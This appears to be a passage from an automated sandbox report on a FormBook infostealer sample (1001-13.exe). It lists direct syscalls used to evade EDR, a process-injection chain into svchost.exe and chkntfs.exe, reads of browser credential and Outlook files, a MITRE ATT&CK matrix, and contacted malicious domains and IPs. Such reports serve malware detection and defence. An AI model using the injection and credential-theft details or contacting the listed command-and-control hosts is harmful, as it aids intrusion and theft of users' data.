                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E509D5 SetUnhandledExceptionFilter,0_2_00E509D5
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E50C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E50C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\chkntfs.exeThread register set: target process: 2144Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\chkntfs.exeThread APC queued: target process: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\1001-13.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 811008Jump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E91201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00E91201
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E72BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E72BA5
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E9B226 SendInput,keybd_event,0_2_00E9B226
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EB22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00EB22DA
                Source: C:\Users\user\Desktop\1001-13.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1001-13.exe"Jump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E90B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00E90B62
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E91663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00E91663
                Source: 1001-13.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: OlGIUOYUZW.exe, 00000007.00000002.3994650361.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000000.2544829229.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996136932.0000000000D01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: 1001-13.exe, OlGIUOYUZW.exe, 00000007.00000002.3994650361.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000000.2544829229.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996136932.0000000000D01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: OlGIUOYUZW.exe, 00000007.00000002.3994650361.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000000.2544829229.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996136932.0000000000D01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: OlGIUOYUZW.exe, 00000007.00000002.3994650361.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000000.2544829229.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996136932.0000000000D01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E50698 cpuid 0_2_00E50698
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00EA8195
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E8D27A GetUserNameW,0_2_00E8D27A
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E6B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00E6B952
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E342DE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3995040974.0000000004620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2629802419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2630146597.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2630585568.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3994023782.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3993353772.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3995415844.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: 1001-13.exeBinary or memory string: WIN_81
                Source: 1001-13.exeBinary or memory string: WIN_XP
                Source: 1001-13.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: 1001-13.exeBinary or memory string: WIN_XPe
                Source: 1001-13.exeBinary or memory string: WIN_VISTA
                Source: 1001-13.exeBinary or memory string: WIN_7
                Source: 1001-13.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3995040974.0000000004620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2629802419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2630146597.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2630585568.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3994023782.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3993353772.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3995415844.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EB1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00EB1204
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EB1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00EB1806

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets341
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials12
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589871 Sample: 1001-13.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 28 www.laduta.xyz 2->28 30 www.explorevision.xyz 2->30 32 9 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 1001-13.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->66 68 3 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 OlGIUOYUZW.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 chkntfs.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 OlGIUOYUZW.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.ripbgs.info 47.83.1.90, 49997, 49998, 49999 VODANETInternationalIP-BackboneofVodafoneDE United States 22->34 36 www.babyzhibo.net 192.186.58.31, 50006, 50007, 50008 PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL United States 22->36 38 6 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                1001-13.exe61%VirustotalBrowse
                1001-13.exe68%ReversingLabsWin32.Worm.DorkBot
                1001-13.exe100%AviraDR/AutoIt.Gen8
                1001-13.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.einpisalpace.shop/pgw3/0%Avira URL Cloudsafe
                http://www.jiuyuezhibo.net0%Avira URL Cloudsafe
                http://www.oshwal.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.png0%Avira URL Cloudsafe
                http://www.mzkd6gp5.top/utww/0%Avira URL Cloudsafe
                http://www.zhonglangzhibo.net0%Avira URL Cloudsafe
                http://www.liufangzhibo.com0%Avira URL Cloudsafe
                http://www.maituzhibo.com0%Avira URL Cloudsafe
                http://www.qimiaozhibo.com0%Avira URL Cloudsafe
                http://www.liuhuazhibo.net0%Avira URL Cloudsafe
                http://www.elecsa.net0%Avira URL Cloudsafe
                http://einpisalpace.shop/0%Avira URL Cloudsafe
                https://laduta.xyz/d89m?CviT=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl0%Avira URL Cloudsafe
                http://www.lovemarketing.net0%Avira URL Cloudsafe
                http://www.maskmakers.net0%Avira URL Cloudsafe
                http://www.yundouzhibo.net0%Avira URL Cloudsafe
                http://www.xiaomiaozhibo.net0%Avira URL Cloudsafe
                http://www.medicalink.net0%Avira URL Cloudsafe
                http://www.banditi.net0%Avira URL Cloudsafe
                http://www.wuyezhibo.com0%Avira URL Cloudsafe
                http://www.eventsmedia.net0%Avira URL Cloudsafe
                http://www.68markavenue.net0%Avira URL Cloudsafe
                http://www.hairdeluxe.net0%Avira URL Cloudsafe
                https://white.anva.org.cn/0%Avira URL Cloudsafe
                http://www.agrobazar.net0%Avira URL Cloudsafe
                http://www.legalvideos.net0%Avira URL Cloudsafe
                http://www.laduta.xyz/d89m/?CviT=wOJtjxBUJG0NHp56IJ7sd/1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F/TSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws=&YFCLW=BxgTctSh0%Avira URL Cloudsafe
                http://www.nuoyunzhibo.com0%Avira URL Cloudsafe
                http://www.welovebeauty.net0%Avira URL Cloudsafe
                http://www.xunaizhibo.com/binding0%Avira URL Cloudsafe
                http://www.babyzhibo.net/wn9b/0%Avira URL Cloudsafe
                https://zzlz.gsxt.gov.cn/0%Avira URL Cloudsafe
                http://www.perfectpint.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js0%Avira URL Cloudsafe
                http://www.huayuzhibo.net0%Avira URL Cloudsafe
                http://www.theflowerpot.net0%Avira URL Cloudsafe
                http://www.wuyezhibo.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js0%Avira URL Cloudsafe
                http://www.legalstrategy.net0%Avira URL Cloudsafe
                http://www.chuncaozhibo.net0%Avira URL Cloudsafe
